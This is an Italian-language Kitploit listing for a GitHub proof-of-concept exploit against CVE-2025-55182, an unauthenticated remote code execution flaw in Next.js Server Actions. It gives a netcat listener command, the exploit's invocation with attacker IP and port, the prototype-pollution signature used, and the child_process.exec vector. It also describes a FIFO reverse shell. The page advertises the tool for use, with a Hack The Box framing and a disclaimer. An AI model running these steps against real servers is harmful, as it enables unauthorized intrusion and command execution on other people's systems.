Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/uwugreed/cve-2025-55182-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

So, probabilmente sei qui da Hack the Box, se è così, sì, questo funziona davvero.

Vedi Repository
7h 42m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182-poc

Una proof-of-concept (PoC) per CVE-2025-55182, che mira a una vulnerabilità di Remote Code Execution (RCE) non autenticata nelle Server Actions di Next.js.

Questo exploit abusa della prototype pollution durante la deserializzazione dei payload multipart dei React Server Components (RSC) per iniettare comandi dannosi nel processo Node.js utilizzando un flusso di esecuzione asincrono e non bloccante.


Caratteristiche

  • Esecuzione asincrona: utilizza child_process.exec() invece delle API bloccanti execSync() per prevenire il blocco dei thread sui nodi container.
  • Consegna multi-shell robusta: sfrutta una stringa di reverse shell tramite FIFO pipe conforme a POSIX per la massima stabilità di esecuzione sui motori container Linux minimalisti.
  • Nessuna dipendenza esterna: costruito interamente utilizzando la libreria nativa requests di Python.

Utilizzo

1. Configura il tuo listener

Apri un terminale sul tuo host di attacco e avvia un listener socket netcat per catturare la connessione inversa in arrivo:

root@kitploit:~
nc -lvnp 4444

2. Esegui lo script

Fornisci l'URL di base del target, l'indirizzo IP della tua interfaccia host locale e la porta del listener desiderata:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

Esempio:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

Dettagli tecnici

Lo script invia un payload multipart grezzo e appositamente costruito direttamente all'endpoint di routing dell'applicazione con l'header di routing Next-Action richiesto.

Sfruttando le firme di costruzione degli oggetti tramite {"get":"$1:constructor:constructor"}, il motore di deserializzazione inquina l'albero degli oggetti nativi. Durante l'elaborazione dei parametri associati, interpreta il blocco di contesto _response incorporato in modo dannoso come una coda di istruzioni, consentendo l'esecuzione del codice con i privilegi del contesto utente del server Node in esecuzione.

root@kitploit:~
// Vettore target sottostante:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ Disclaimer

Questo script è creato strettamente per scopi educativi, test di sicurezza autorizzati e per catturare flag vulnerabili su laboratori come Hack The Box. L'autore non è responsabile per qualsiasi uso improprio, intrusioni di sistema non autorizzate o danni causati da questo strumento.

Scarica lo strumento